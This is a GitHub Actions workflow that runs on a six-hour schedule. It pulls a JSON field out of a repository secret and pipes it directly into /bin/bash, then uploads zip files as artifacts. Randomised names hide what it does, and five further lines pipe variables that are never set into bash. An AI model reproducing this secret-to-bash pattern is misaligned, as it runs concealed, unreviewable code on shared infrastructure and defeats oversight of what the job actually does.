name: xiansongenyuan
on:
  workflow_dispatch:

  schedule:
    - cron: '48 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiansongenyuan
        env:
          bjx54001: ${{ secrets.bjx54001 }}
        run: |
          printf '%s' "$bjx54001" | jq -r .pde842 | /bin/bash
          echo $ae27 | jq -r .ljsg002 | /bin/bash
          printf '%s' "$ufgl78843" | jq -r .fyis053 | /bin/bash
          echo $rs60960 | jq -r .vt5 | /bin/bash
          printf '%s' "$yic27" | jq -r .ys12618 | /bin/bash
          printf '%s' "$os009" | jq -r .ddls0229 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: SclGriQT
          path: "*.zip"
          retention-days: 1
